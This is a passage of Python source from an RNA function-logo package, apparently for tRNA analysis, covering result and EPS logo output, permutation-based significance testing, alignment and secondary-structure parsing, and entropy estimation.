distribution.stat_test(self.inverseInfo, self.inverseHeight,\n correction)\n else:\n self.p = distribution.stat_test(self.info, self.height, correction)\n\n def get(self, position, state):\n ret_counter = Counter()\n if (len(position) == 1):\n for x in self.sequences:\n if (x.seq[position[0]] == state[0]):\n ret_counter[x.function] += 1\n if (len(position) == 2):\n for x in self.sequences:\n if (x.seq[position[0]] == state[0] and x.seq[position[1]] == state[1]):\n ret_counter[x.function] += 1\n\n return ret_counter\n\n def text_output(self):\n \"\"\"\n Write results to file named\\: :attr:`name`\\_results.txt\n \"\"\"\n # build output heading\n file_handle = open(\"{}_results.txt\".format(self.name.split(\"/\")[-1]), \"w\")\n heading_dict = {}\n if (self.p):\n heading_dict['P'] = \"\\tp-value\\t{}\".format(self.correction)\n heading_dict['p'] = \"\\tclass:height:p-value:{}\".format(self.correction)\n else:\n heading_dict['P'] = \"\"\n heading_dict['p'] = \"\\tclass:height\"\n\n print(\"#bp\\tcoord\\tstate\\tN\\tinfo{P}{p}\".format(**heading_dict), file=file_handle)\n for coord in sorted(self.basepairs, key=itemgetter(0)):\n if (coord in self.info):\n for pairtype in sorted(self.info[coord]):\n output_string = \"bp:\\t{}\".format(coord)\n output_string += \"\\t{}\\t{}\\t{:05.3f}\\t\".format(pairtype, sum(self.get(coord, pairtype).values()),\n self.info[coord][pairtype])\n if (self.p):\n output_string += \"{:08.6f}\".format(self.p['P'][coord][pairtype])\n output_string += \"\\t{:08.6f}\".format(self.p['P_corrected'][coord][pairtype])\n\n output_string += \"\\t\"\n for aainfo in sorted(self.height[coord][pairtype].items(), key=itemgetter(1), reverse=True):\n output_string += \"{}:{:05.3f}\".format(aainfo[0], aainfo[1])\n if (self.p):\n output_string += \":{:08.6f}\".format(self.p['p'][coord][pairtype][aainfo[0].upper()])\n output_string += \":{:08.6f}\".format(\n self.p['p_corrected'][coord][pairtype][aainfo[0].upper()])\n output_string += \" \"\n\n print(output_string, file=file_handle)\n\n if (self.inverseInfo):\n print(\"#ibp\\tcoord\\tstate\\tN\\tinfo{P}{p}\".format(**heading_dict), file=file_handle)\n for coord in sorted(self.basepairs, key=itemgetter(0)):\n if (coord in self.inverseInfo):\n for pairtype in sorted(self.inverseInfo[coord]):\n output_string = \"ibp:\\t{}\".format(coord)\n output_string += \"\\t{}\\t{}\\t{:05.3f}\\t\".format(pairtype, sum(self.get(coord, pairtype).values()),\n self.inverseInfo[coord][pairtype])\n if (self.p):\n output_string += \"{:08.6f}\".format(self.inverse_p['P'][coord][pairtype])\n output_string += \"\\t{:08.6f}\".format(self.inverse_p['P_corrected'][coord][pairtype])\n\n output_string += \"\\t\"\n for aainfo in sorted(self.inverseHeight[coord][pairtype].items(), key=itemgetter(1), reverse=True):\n output_string += \"{}:{:05.3f}\".format(aainfo[0], aainfo[1])\n if (self.p):\n output_string += \":{:08.6f}\".format(self.inverse_p['p'][coord][pairtype][aainfo[0].upper()])\n output_string += \":{:08.6f}\".format(\n self.inverse_p['p_corrected'][coord][pairtype][aainfo[0].upper()])\n output_string += \" \"\n\n print(output_string, file=file_handle)\n\n print(\"#ss\\tcoord\\tstate\\tN\\tinfo{P}{p}\".format(**heading_dict), file=file_handle)\n for coord in range(self.pos):\n if (coord in self.info):\n for base in sorted(self.info[coord]):\n output_string = \"ss:\\t{}\\t{}\\t{}\\t{:05.3f}\".format(coord, base,\n sum(self.get([coord], base).values()),\n self.info[coord][base])\n if (self.p):\n output_string += \"\\t{:08.6f}\".format(self.p['P'][coord][base])\n output_string += \"\\t{:08.6f}\".format(self.p['P_corrected'][coord][base])\n\n output_string += \"\\t\"\n for aainfo in sorted(self.height[coord][base].items(), key=itemgetter(1), reverse=True):\n output_string += \"{}:{:05.3f}\".format(aainfo[0], aainfo[1])\n if (self.p):\n output_string += \":{:08.6f}\".format(self.p['p'][coord][base][aainfo[0].upper()])\n output_string += \":{:08.6f}\".format(self.p['p_corrected'][coord][base][aainfo[0].upper()])\n output_string += \" \"\n\n print(output_string, file=file_handle)\n\n if (self.inverseInfo):\n print(\"#iss\\tcoord\\tstate\\tN\\tinfo{P}{p}\".format(**heading_dict), file=file_handle)\n for coord in range(self.pos):\n if (coord in self.inverseInfo):\n for base in sorted(self.inverseInfo[coord]):\n output_string = \"iss:\\t{}\\t{}\\t{}\\t{:05.3f}\".format(coord, base,\n sum(self.get([coord], base).values()),\n self.inverseInfo[coord][base])\n if (self.p):\n output_string += \"\\t{:08.6f}\".format(self.inverse_p['P'][coord][base])\n output_string += \"\\t{:08.6f}\".format(self.inverse_p['P_corrected'][coord][base])\n\n output_string += \"\\t\"\n for aainfo in sorted(self.inverseHeight[coord][base].items(), key=itemgetter(1), reverse=True):\n output_string += \"{}:{:05.3f}\".format(aainfo[0], aainfo[1])\n if (self.p):\n output_string += \":{:08.6f}\".format(self.inverse_p['p'][coord][base][aainfo[0].upper()])\n output_string += \":{:08.6f}\".format(\n self.inverse_p['p_corrected'][coord][base][aainfo[0].upper()])\n output_string += \" \"\n\n print(output_string, file=file_handle)\n file_handle.close()\n\n def logo_output_idLogo(self):\n coord_length = 0 # used to determine eps height\n coord_length_addition = 0\n logo_outputDict = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n\n for coord in range(self.pos):\n for base in sorted(self.singles):\n\n if (base in self.info[coord]):\n if base not in self.height[coord]:\n self.height[coord][base] = {}\n for aainfo in sorted(self.height[coord][base].items(), key=itemgetter(1), reverse=True):\n logo_outputDict[base][coord][aainfo[0]] = self.info[coord][base] * aainfo[1]\n else:\n logo_outputDict[base][coord] = {}\n\n # output logos\n for base in logo_outputDict:\n logodata = \"\"\n for coord in sorted(logo_outputDict[base].keys()):\n if (len(str(coord)) > coord_length):\n coord_length = len(str(coord))\n logodata += \"numbering {{({}) makenumber}} if\\ngsave\\n\".format(coord)\n for aainfo in sorted(logo_outputDict[base][coord].items(), key=itemgetter(1)):\n if (aainfo[1] < 0.0001 or mt.isnan(aainfo[1])):\n continue\n logodata += \"{:07.5f} ({}) numchar\\n\".format(aainfo[1], aainfo[0].upper())\n logodata += \"grestore\\nshift\\n\"\n # output logodata to template\n template_byte = pkgutil.get_data('tsfm', 'eps/Template.eps')\n logo_template = template_byte.decode('utf-8')\n with open(\"{}_{}.eps\".format(base, self.name.split(\"/\")[-1]), \"w\") as logo_output:\n src = Template(logo_template)\n if (len(base) == 2):\n logodata_dict = {'logo_data': logodata, 'low': min(logo_outputDict[base].keys()),\n 'high': max(logo_outputDict[base].keys()),\n 'length': 21 * len(logo_outputDict[base].keys()),\n 'height': 735 - (5 * (coord_length + coord_length_addition))}\n else:\n logodata_dict = {'logo_data': logodata, 'low': min(logo_outputDict[base].keys()),\n 'high': max(logo_outputDict[base].keys()),\n 'length': 15.68 * len(logo_outputDict[base].keys()),\n 'height': 735 - (5 * (coord_length + coord_length_addition))}\n logo_output.write(src.substitute(logodata_dict))\n\n def logo_output(self, inverse=False):\n \"\"\"\n Produce function logo postscript files\n \"\"\"\n coord_length = 0 # used to determine eps height\n coord_length_addition = 0\n # print(\" hiiiiiiiiiiiii\", len(self.basepairs))\n logo_outputDict = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n\n # logo output dict construction\n for coord in sorted(self.basepairs, key=itemgetter(0)):\n\n for pairtype in sorted(self.pairs):\n if (coord in self.info and pairtype in self.info[coord]): # we added this.\n for aainfo in sorted(self.height[coord][pairtype].items(), key=itemgetter(1), reverse=True):\n logo_outputDict[pairtype][coord][aainfo[0]] = self.info[coord][pairtype] * aainfo[1]\n else:\n logo_outputDict[pairtype][coord] = {}\n\n for coord in range(self.pos): # 0,1,2..,72\n for base in sorted(self.singles): # ACGU..\n if (base in self.info[coord]):\n # print(self.height[coord][base].items(), \" items.\")\n for aainfo in sorted(self.height[coord][base].items(), key=itemgetter(1), reverse=True):\n logo_outputDict[base][coord][aainfo[0]] = self.info[coord][base] * aainfo[1]\n else:\n logo_outputDict[base][coord] = {}\n\n # output logos\n for base in logo_outputDict:\n logodata = \"\"\n for coord in sorted(logo_outputDict[base].keys()):\n if (len(str(coord)) > coord_length):\n coord_length = len(str(coord))\n logodata += \"numbering {{({}) makenumber}} if\\ngsave\\n\".format(coord)\n for aainfo in sorted(logo_outputDict[base][coord].items(), key=itemgetter(1)):\n if (aainfo[1] < 0.0001 or mt.isnan(aainfo[1])):\n continue\n logodata += \"{:07.5f} ({}) numchar\\n\".format(aainfo[1], aainfo[0].upper())\n logodata += \"grestore\\nshift\\n\"\n # output logodata to template\n template_byte = pkgutil.get_data('tsfm', 'eps/Template.eps')\n logo_template = template_byte.decode('utf-8')\n with open(\"{}_{}.eps\".format(base, self.name.split(\"/\")[-1]), \"w\") as logo_output:\n src = Template(logo_template)\n if (len(base) == 2):\n logodata_dict = {'logo_data': logodata, 'low': min(logo_outputDict[base].keys()),\n 'high': max(logo_outputDict[base].keys()),\n 'length': 21 * len(logo_outputDict[base].keys()),\n 'height': 735 - (5 * (coord_length + coord_length_addition))}\n # print(735 - (5 * (coord_length + coord_length_addition)), \"heigh base\")\n else:\n logodata_dict = {'logo_data': logodata, 'low': min(logo_outputDict[base].keys()),\n 'high': max(logo_outputDict[base].keys()),\n 'length': 15.68 * len(logo_outputDict[base].keys()),\n 'height': 735 - (5 * (coord_length + coord_length_addition))}\n # print(735 - (5 * (coord_length + coord_length_addition)), \"heigh\", base)\n\n # print(logo_outputDict[base].keys(),base)\n # print(logodata_dict)\n # print( 735 - (5 * (coord_length + coord_length_addition)),\"kkkkkkkkkkkkkk\")\n logo_output.write(src.substitute(logodata_dict))\n\n if (inverse):\n\n inverse_logo_outputDict = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n # inverse logo output dict construction\n for coord in sorted(self.basepairs, key=itemgetter(0)):\n for pairtype in sorted(self.pairs):\n if (pairtype in self.inverseInfo[coord]):\n for aainfo in sorted(self.inverseHeight[coord][pairtype].items(), key=itemgetter(1),\n reverse=True):\n inverse_logo_outputDict[pairtype][coord][aainfo[0]] = self.inverseInfo[coord][pairtype] * \\\n aainfo[1]\n else:\n inverse_logo_outputDict[pairtype][coord] = {}\n\n for coord in range(self.pos):\n for base in sorted(self.singles):\n if (base in self.inverseInfo[coord]):\n for aainfo in sorted(self.inverseHeight[coord][base].items(), key=itemgetter(1), reverse=True):\n inverse_logo_outputDict[base][coord][aainfo[0]] = self.inverseInfo[coord][base] * aainfo[1]\n else:\n inverse_logo_outputDict[base][coord] = {}\n\n for base in inverse_logo_outputDict:\n logodata = \"\"\n for coord in sorted(inverse_logo_outputDict[base].keys()):\n if (len(str(coord)) > coord_length):\n coord_length = len(str(coord))\n logodata += \"numbering {{({}) makenumber}} if\\ngsave\\n\".format(coord)\n for aainfo in sorted(inverse_logo_outputDict[base][coord].items(), key=itemgetter(1)):\n if (aainfo[1] < 0.0001 or mt.isnan(aainfo[1])):\n continue\n logodata += \"{:07.5f} ({}) numchar\\n\".format(aainfo[1], aainfo[0].upper())\n logodata += \"grestore\\nshift\\n\"\n # output logodata to template\n template_byte = pkgutil.get_data('tsfm', 'eps/Template.eps')\n logo_template = template_byte.decode('utf-8')\n with open(\"inverse_{}_{}.eps\".format(base, self.name.split(\"/\")[-1]), \"w\") as logo_output:\n src = Template(logo_template)\n if (len(base) == 2):\n logodata_dict = {'logo_data': logodata, 'low': min(inverse_logo_outputDict[base].keys()),\n 'high': max(inverse_logo_outputDict[base].keys()),\n 'length': 21 * len(inverse_logo_outputDict[base].keys()),\n 'height': 735 - (5 * (coord_length + coord_length_addition))}\n else:\n logodata_dict = {'logo_data': logodata, 'low': min(inverse_logo_outputDict[base].keys()),\n 'high': max(inverse_logo_outputDict[base].keys()),\n 'length': 15.68 * len(inverse_logo_outputDict[base].keys()),\n 'height': 735 - (5 * (coord_length + coord_length_addition))}\n logo_output.write(src.substitute(logodata_dict))\n\n\nclass FunctionLogoDist:\n \"\"\"\n Discrete probability distributions of information values.\n Probabilty distributions are created using a permutation label shuffling\n strategy. Permuted data is created using :meth:`FunctionLogo.permute` and\n distribution are inferred from the permuted data and \n :class:`FunctionLogoDist` objects created using \n :meth:`FunctionLogo.permInfo`.\n\n Attributes:\n bpinfodist (:obj:`dict` of :obj:`float` mapping to :obj:`int`):\n Discrete probability distribution of basepair feature information\n bpheightdist (:obj:`dict` of :obj:`float` mapping to :obj:`int`):\n Discrete probability distribution of functional class \n information of basepair features\n singleinfodist (:obj:`dict` of :obj:`float` mapping to :obj:`int`):\n Discrete probability distribution of single base feature information\n singleheightdist (:obj:`dict` of :obj:`float` mapping to :obj:`int`):\n Discrete probability distribution of functional class \n information of single base features\n\n \"\"\"\n\n def __init__(self):\n\n self.bpinfodist = defaultdict(int)\n self.bpheightdist = defaultdict(int)\n\n self.singleinfodist = defaultdict(int)\n self.singleheightdist = defaultdict(int)\n\n def weighted_dist(self, bpdata, singledata):\n for x in bpdata[0]:\n self.bpinfodist[x] += 1\n for x in bpdata[1]:\n self.bpheightdist[x] += 1\n\n for x in singledata[0]:\n self.singleinfodist[x] += 1\n for x in singledata[1]:\n self.singleheightdist[x] += 1\n\n self.bpinfo_sorted_keys = sorted(self.bpinfodist.keys())\n self.bpheight_sorted_keys = sorted(self.bpheightdist.keys())\n self.ssinfo_sorted_keys = sorted(self.singleinfodist.keys())\n self.ssheight_sorted_keys = sorted(self.singleheightdist.keys())\n\n def stat_test(self, info, height, correction):\n \"\"\"\n Performs statistical tests and multiple test correction.\n\n Calculates a p-value using a right tail probability test on the\n instance's discrete probability distributions. Methods for multiple test\n correction are provided by :class:`statsmodels.stats.multitest`. This\n method is usually invoked using :meth:`FunctionLogoResults.add_stats`.\n\n Args:\n info (:obj:`dict` of :obj:`int` or :obj:`tuple` mapping to :obj:`dict` of :obj:`str` mapping to :obj:`float`):\n mapping of structural features to information content.\n height (:obj:`dict` of :obj:`int` or :obj:`tuple` mapping to :obj:`dict` of :obj:`str` mapping to :obj:`dict` of :obj:`str` mapping to :obj:`float`):\n mapping of structural features and functional class to class height.\n correction (:obj:`str`): Method for multiple test correction. Any \n method available in :class:`statsmodels.stats.multitest` is a\n valid option\n \"\"\"\n P = defaultdict(lambda: defaultdict(float))\n P_corrected = defaultdict(lambda: defaultdict(float))\n p = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n p_corrected = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n bp_coords = []\n ss_coords = []\n for coord in info:\n for pairtype in info[coord]:\n if (\",\" in str(coord)):\n bp_coords.append(coord)\n P[coord][pairtype] = self.rtp(self.bpinfodist, info[coord][pairtype], self.bpinfo_sorted_keys)\n for aa in height[coord][pairtype]:\n p[coord][pairtype][aa] = self.rtp(self.bpheightdist,\n info[coord][pairtype] * height[coord][pairtype][aa],\n self.bpheight_sorted_keys)\n else:\n ss_coords.append(coord)\n P[coord][pairtype] = self.rtp(self.singleinfodist, info[coord][pairtype], self.ssinfo_sorted_keys)\n for aa in height[coord][pairtype]:\n p[coord][pairtype][aa] = self.rtp(self.singleheightdist,\n info[coord][pairtype] * height[coord][pairtype][aa],\n self.ssheight_sorted_keys)\n test_bp = []\n test_ss = []\n bp_coords.sort()\n ss_coords.sort()\n for coord in bp_coords:\n for pairtype in sorted(P[coord]):\n test_bp.append(P[coord][pairtype])\n\n for coord in ss_coords:\n for pairtype in sorted(P[coord]):\n test_ss.append(P[coord][pairtype])\n\n test_bp_results = smm.multipletests(test_bp, method=correction)[1].tolist()\n test_ss_results = smm.multipletests(test_ss, method=correction)[1].tolist()\n\n for coord in bp_coords:\n for pairtype in sorted(P[coord]):\n P_corrected[coord][pairtype] = test_bp_results.pop(0)\n\n for coord in ss_coords:\n for pairtype in sorted(P[coord]):\n P_corrected[coord][pairtype] = test_ss_results.pop(0)\n\n test_bp = []\n test_ss = []\n for coord in bp_coords:\n for pairtype in sorted(p[coord]):\n for aa in sorted(p[coord][pairtype]):\n test_bp.append(p[coord][pairtype][aa])\n\n for coord in ss_coords:\n for pairtype in sorted(p[coord]):\n for aa in sorted(p[coord][pairtype]):\n test_ss.append(p[coord][pairtype][aa])\n\n test_bp_results = smm.multipletests(test_bp, method=correction)[1].tolist()\n test_ss_results = smm.multipletests(test_ss, method=correction)[1].tolist()\n\n for coord in bp_coords:\n for pairtype in sorted(p[coord]):\n for aa in sorted(p[coord][pairtype]):\n p_corrected[coord][pairtype][aa] = test_bp_results.pop(0)\n\n for coord in ss_coords:\n for pairtype in sorted(p[coord]):\n for aa in sorted(p[coord][pairtype]):\n p_corrected[coord][pairtype][aa] = test_ss_results.pop(0)\n\n return {'P': P, 'p': p, \"P_corrected\": P_corrected, \"p_corrected\": p_corrected}\n\n def rtp(self, data, point, keys_sorted):\n if (point > 0):\n part = 0\n total = sum(data.values())\n i = bisect.bisect_left(keys_sorted, point)\n if (point <= keys_sorted[-1]):\n for y in keys_sorted[i:]:\n part += data[y]\n return part / total\n else:\n return 0.0\n else:\n return 1.0\n\n\nclass Seq:\n \"\"\"\n Providing a data structure constisting of a molecular sequence labeled with a functional class.\n\n Args:\n function (:obj:`str`): Functional annotation of the sequence.\n seq (:obj:`str`): Molecular sequence data.\n \"\"\"\n\n def __init__(self, function, seq):\n self.function = function\n self.seq = seq\n\n def __len__(self):\n return len(self.seq)\n\n\nclass FunctionLogo:\n \"\"\"\n Parses structural and sequence infomation and provides methods for Function Logo calculations\n\n This class provided data structures and methods for calculating \n functional information of basepair a single base features. Additionally,\n methods for producing permuted data sets with function class labels\n shuffled.\n \n Args:\n struct_file (:obj:`str`): File name containing secondary structure\n notation in cove, infernal, or text format.\n kind (:obj:`str`): secondary structure notation format.\n\n \"\"\"\n\n def __init__(self, struct_file, kind=None, exact_init=None, inverse_init=None):\n if (exact_init):\n self.exact = exact_init\n else:\n self.exact = []\n\n if (inverse_init):\n self.inverse_exact = inverse_init\n else:\n self.inverse_exact = []\n\n if (kind):\n if (kind == \"s\"):\n self.basepairs = []\n else:\n self.parse_struct(struct_file, kind)\n else:\n self.basepairs = struct_file\n self.pos = 0\n self.sequences = []\n self.pairs = set()\n self.singles = set()\n self.functions = Counter()\n\n def parse_sequences(self, file_prefix):\n \"\"\"\n Parse sequence alignment data in clustal format\n\n Sequence alignment files are required to be in clustal format with\n each functional class having its own file. Alignment files must\n conform to the naming standard ``fileprefix_functionalclass.aln``.\n\n Args:\n file_prefix (:obj:`str`): Prefix used to identify a group of alignment files.\n\n \"\"\"\n for fn in glob.glob(\"{}_?.aln\".format(file_prefix)):\n match = re.search(\"_([A-Z])\\.aln\", fn)\n aa_class = match.group(1)\n with open(fn, \"r\") as ALN:\n good = False\n begin_seq = False\n interleaved = False\n seq = {}\n for line in ALN:\n match = re.search(\"^(\\S+)\\s+(\\S+)\", line)\n if (re.search(\"^CLUSTAL\", line)):\n good = True\n continue\n elif (re.search(\"^[\\s\\*\\.\\:]+$\", line) and not interleaved and begin_seq):\n interleaved = True\n elif (re.search(\"^[\\s\\*\\.\\:]+$\", line) and interleaved and begin_seq):\n continue\n elif (match and not interleaved):\n begin_seq = True\n if (not good):\n sys.exit(\"File {} appears not to be a clustal file\".format(fn))\n seq[match.group(1)] = match.group(2)\n elif (match and interleaved):\n seq[match.group(1)] += match.group(2)\n for sequence in seq.values():\n # print(aa_class)\n self.add_sequence(aa_class, sequence.upper().replace(\"T\", \"U\"))\n\n print(\"{} alignments parsed\".format(len(self.functions.keys())), file=sys.stderr)\n\n def parse_struct(self, struct_file, kind):\n \"\"\"\n Parse secondary structure file for basepair locations.\n\n Args:\n struct_file (:obj:`str`): File containing structural annotation\n kind (:obj:`str`): Structural annotation format\n \"\"\"\n print(\"Parsing base-pair coordinates\", file=sys.stderr)\n basepairs = []\n ss = \"\"\n pairs = defaultdict(list)\n tarm = 0\n stack = []\n if (kind == \"infernal\"):\n for line in struct_file:\n line = line.strip()\n ss += line.split()[2]\n struct_file.seek(0)\n\n state = \"start\"\n for count, i in enumerate(ss):\n if (i == \"(\"):\n if (state == \"start\"):\n state = \"A\"\n elif (i == \"<\"):\n stack.append(count)\n if (state == \"A\"):\n state == \"D\"\n elif (state == \"cD\"):\n state = \"C\"\n elif (state == \"cC\"):\n state = \"T\"\n elif (i == \">\"):\n if (state == \"D\"):\n state = \"cD\"\n elif (state == \"C\"):\n state = \"cC\"\n elif (state == \"T\"):\n state = \"cT\"\n\n arm = state.replace(\"c\", \"\")\n pairs[arm].append([stack.pop(), count])\n elif (i == \")\"):\n pairs['A'].append([stack.pop(), count])\n\n for arm in pairs:\n for pair in pairs[arm]:\n basepairs.append((pair[0], pair[1]))\n\n if (kind == \"cove\"):\n for line in struct_file:\n line = line.strip()\n ss += line.split()[1]\n struct_file.seek(0)\n\n state = \"start\"\n for count, i in enumerate(ss):\n if (i == \">\" and (state == \"start\" or state == \"AD\")):\n if (state == \"start\"):\n state = \"AD\"\n stack.append(count)\n\n elif (i == \"<\" and (state == \"AD\" or state == \"D\")):\n if (state == \"AD\"):\n state = \"D\"\n pairs[state].append([stack.pop(), count])\n\n elif (i == \">\" and (state == \"D\" or state == \"C\")):\n if (state == \"D\"):\n state = \"C\"\n stack.append(count)\n\n elif (i == \"<\" and (state == \"C\" or state == \"cC\")):\n if (state == \"C\"):\n state = \"cC\"\n pairs[\"C\"].append([stack.pop(), count])\n\n elif (i == \">\" and (state == \"cC\" or state == \"T\")):\n if (state == \"cC\"):\n state = \"T\"\n stack.append(count)\n tarm += 1\n\n elif (i == \"<\" and (state == \"T\" and tarm > 0)):\n pairs[state].append([stack.pop(), count])\n tarm -= 1\n\n elif (i == \"<\" and (state == \"T\" or state == \"A\") and tarm == 0):\n state = \"A\"\n pairs[state].append([stack.pop(), count])\n\n for arm in pairs:\n for pair in pairs[arm]:\n basepairs.append((pair[0], pair[1]))\n\n if (kind == \"text\"):\n for line in struct_file:\n coords = \"\".join(line.split(\":\")[1])\n coords = coords.split(\",\")\n for coord1, coord2 in zip(coords[0::2], coords[1::2]):\n basepairs.append((int(coord1), int(coord2)))\n\n self.basepairs = basepairs\n\n def approx_expect(self, H, k, N):\n return H - ((k - 1) / ((mt.log(4)) * N))\n\n def exact_run(self, n, p, numclasses):\n ######################################\n j = exact.calc_exact(n, p, numclasses)\n print(\"{:2} {:07.5f}\".format(n, j[1]), file=sys.stderr)\n return j\n\n def permuted(self, items, pieces=2):\n random.seed()\n sublists = [[] for i in range(pieces)]\n for x in items:\n sublists[random.randint(0, pieces - 1)].append(x)\n permutedList = []\n for i in range(pieces):\n time.sleep(0.01)\n random.seed()\n random.shuffle(sublists[i])\n permutedList.extend(sublists[i])\n return permutedList\n\n def permutations(self, numPerm, aa_classes):\n indices = []\n permStructList = []\n for p in range(numPerm):\n indices.append(self.permuted(aa_classes))\n for index in indices:\n permStruct = FunctionLogo(self.basepairs, exact_init=self.exact, inverse_init=self.inverse_exact)\n for i, seqs in enumerate(self.sequences):\n permStruct.add_sequence(index[i], seqs.seq)\n permStructList.append(permStruct)\n return permStructList\n\n def permute(self, permute_num, proc):\n \"\"\"\n Creates permuted datasets by shuffling functional annotation labels of sequences.\n\n Args:\n permute_num (:obj:`int`): Number of permutations to perform\n proc (:obj:`int`): Number of concurrent processes to run\n \"\"\"\n with Pool(processes=proc) as pool:\n perm_jobs = []\n for x in range(proc):\n if (x == 0):\n perm_jobs.append((permute_num // proc + permute_num % proc, self.get_functions()))\n else:\n perm_jobs.append((permute_num // proc, self.get_functions()))\n\n perm_results = pool.starmap(self.permutations, perm_jobs)\n self.permutationList = []\n for x in perm_results:\n self.permutationList += x\n\n def permInfo(self, method, proc, inverse=False):\n \"\"\"\n Calculate functional information statistics of permuted datasets.\n\n Args:\n method (:obj:`str`): Entropy estimation method. Either NSB or Miller-Maddow.\n proc (:obj:`int`): Number of concurrent processes to run.\n\n Return:\n perm_dist (:class:`FunctionLogoDist`): Discrete distribution of \n functional information estimated from permuted datasets.\n \"\"\"\n bp_info = []\n bp_height = []\n single_info = []\n single_height = []\n with Pool(processes=proc) as pool:\n if (len(self.permutationList) < proc):\n chunk = 1\n else:\n chunk = len(self.permutationList) // proc\n\n if (not inverse):\n if (method == \"NSB\"):\n perm_info_results = pool.map(self.perm_info_calc_NSB, self.permutationList, chunk)\n else:\n perm_info_results = pool.map(self.perm_info_calc_MM, self.permutationList, chunk)\n else:\n if (method == \"NSB\"):\n perm_info_results = pool.map(self.perm_info_calc_inverse_NSB, self.permutationList, chunk)\n else:\n perm_info_results = pool.map(self.perm_info_calc_inverse_MM, self.permutationList, chunk)\n\n for perm in perm_info_results:\n bp_info.extend(perm[0])\n single_info.extend(perm[1])\n bp_height.extend(perm[2])\n single_height.extend(perm[3])\n\n perm_dist = FunctionLogoDist()\n perm_dist.weighted_dist((bp_info, bp_height), (single_info, single_height))\n return perm_dist\n\n def perm_info_calc_MM(self, x):\n total_info_bp = []\n height_info_bp = []\n total_info_ss = []\n height_info_ss = []\n info, height_dict = x.calculate_entropy_MM()\n for coord in sorted(self.basepairs, key=itemgetter(0)):\n if (coord in info):\n for pairtype in sorted(info[coord]):\n total_info_bp.append(info[coord][pairtype])\n for aainfo in sorted(height_dict[coord][pairtype].items(), key=itemgetter(1), reverse=True):\n height_info_bp.append(aainfo[1] * info[coord][pairtype])\n\n for coord in range(self.pos):\n if (coord in info):\n for base in sorted(info[coord]):\n total_info_ss.append(info[coord][base])\n for aainfo in sorted(height_dict[coord][base].items(), key=itemgetter(1), reverse=True):\n height_info_ss.append(aainfo[1] * info[coord][base])\n\n return (total_info_bp, total_info_ss, height_info_bp, height_info_ss)\n\n def perm_info_calc_inverse_MM(self, x):\n total_info_bp = []\n height_info_bp = []\n total_info_ss = []\n height_info_ss = []\n info, height_dict = x.calculate_entropy_inverse_MM()\n\n for coord in sorted(self.basepairs, key=itemgetter(0)):\n if (coord in info):\n for pairtype in sorted(info[coord]):\n total_info_bp.append(info[coord][pairtype])\n for aainfo in sorted(height_dict[coord][pairtype].items(), key=itemgetter(1), reverse=True):\n height_info_bp.append(aainfo[1] * info[coord][pairtype])\n\n for coord in range(self.pos):\n if (coord in info):\n for base in sorted(info[coord]):\n total_info_ss.append(info[coord][base])\n for aainfo in sorted(height_dict[coord][base].items(), key=itemgetter(1), reverse=True):\n height_info_ss.append(aainfo[1] * info[coord][base])\n\n return (total_info_bp, total_info_ss, height_info_bp, height_info_ss)\n\n def perm_info_calc_inverse_NSB(self, x):\n total_info_bp = []\n height_info_bp = []\n total_info_ss = []\n height_info_ss = []\n info, height_dict = x.calculate_entropy_inverse_NSB()\n\n for coord in sorted(self.basepairs, key=itemgetter(0)):\n if (coord in info):\n for pairtype in sorted(info[coord]):\n total_info_bp.append(info[coord][pairtype])\n for aainfo in sorted(height_dict[coord][pairtype].items(), key=itemgetter(1), reverse=True):\n height_info_bp.append(aainfo[1] * info[coord][pairtype])\n\n for coord in range(self.pos):\n if (coord in info):\n for base in sorted(info[coord]):\n total_info_ss.append(info[coord][base])\n for aainfo in sorted(height_dict[coord][base].items(), key=itemgetter(1), reverse=True):\n height_info_ss.append(aainfo[1] * info[coord][base])\n\n return (total_info_bp, total_info_ss, height_info_bp, height_info_ss)\n\n def perm_info_calc_NSB(self, x):\n total_info_bp = []\n height_info_bp = []\n total_info_ss = []\n height_info_ss = []\n info, height_dict = x.calculate_entropy_NSB()\n\n for coord in sorted(self.basepairs, key=itemgetter(0)):\n if (coord in info):\n for pairtype in sorted(info[coord]):\n total_info_bp.append(info[coord][pairtype])\n for aainfo in sorted(height_dict[coord][pairtype].items(), key=itemgetter(1), reverse=True):\n height_info_bp.append(aainfo[1] * info[coord][pairtype])\n\n for coord in range(self.pos):\n if (coord in info):\n for base in sorted(info[coord]):\n total_info_ss.append(info[coord][base])\n for aainfo in sorted(height_dict[coord][base].items(), key=itemgetter(1), reverse=True):\n height_info_ss.append(aainfo[1] * info[coord][base])\n\n return (total_info_bp, total_info_ss, height_info_bp, height_info_ss)\n\n def calculate_exact(self, n, proc, inverse=False):\n \"\"\"\n Exact method of small sample size correction.\n\n Calculate the exact method of sample size correction for up to N samples.\n Computational intensive portion of the calculation is implemented as a C\n extension. This method is fully described in Schneider et al 1986. \n This calculation is polynomial in sample size. It becomes prohibitively \n expensive to calculate beyond a sample size of 16. The correction \n factor of each sample size will be calculated in parallel up to \n :obj:`proc` at a time.\n\n Args:\n n (:obj:`int`): Calculate correction up to this sample size.\n proc (:obj:`int`): Number of concurrent processes to run\n inverse (:obj:`bool`): If true calculate sample size correction\n for anti-determinates.\n \"\"\"\n exact_list = []\n exact_results = []\n if (inverse):\n inverse_functions = Counter()\n for aa_class in self.functions:\n inverse_functions[aa_class] = sum(self.functions.values()) / self.functions[aa_class]\n\n p = [x / sum(list(inverse_functions.values())) for x in inverse_functions.values()]\n for i in range(1, n + 1):\n exact_list.append((i, p, len(self.functions.values())))\n\n with Pool(processes=proc) as pool:\n exact_results = pool.starmap(self.exact_run, exact_list)\n\n for x in exact_results:\n self.inverse_exact.append(x[1])\n else:\n p = [x / sum(list(self.functions.values())) for x in\n self.functions.values()] # PORTION of each function key. for example: x:0.34\n for i in range(1, n + 1):\n exact_list.append((i, p, len(self.functions.values())))\n\n with Pool(processes=proc) as pool:\n exact_results = pool.starmap(self.exact_run, exact_list)\n\n for x in exact_results:\n self.exact.append(x[1])\n\n def calculate_entropy_MM(self):\n \"\"\"\n Calculate functional information using Miller-Maddow estimator.\n \"\"\"\n info = defaultdict(lambda: defaultdict(float))\n height_dict = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n\n functions_array = np.array(list(self.functions.values()))\n bg_entropy = -np.sum(\n (functions_array[functions_array != 0] / functions_array[functions_array != 0].sum()) * np.log2(\n functions_array[functions_array != 0] / functions_array[functions_array != 0].sum()))\n for pairs in self.basepairs:\n for state in 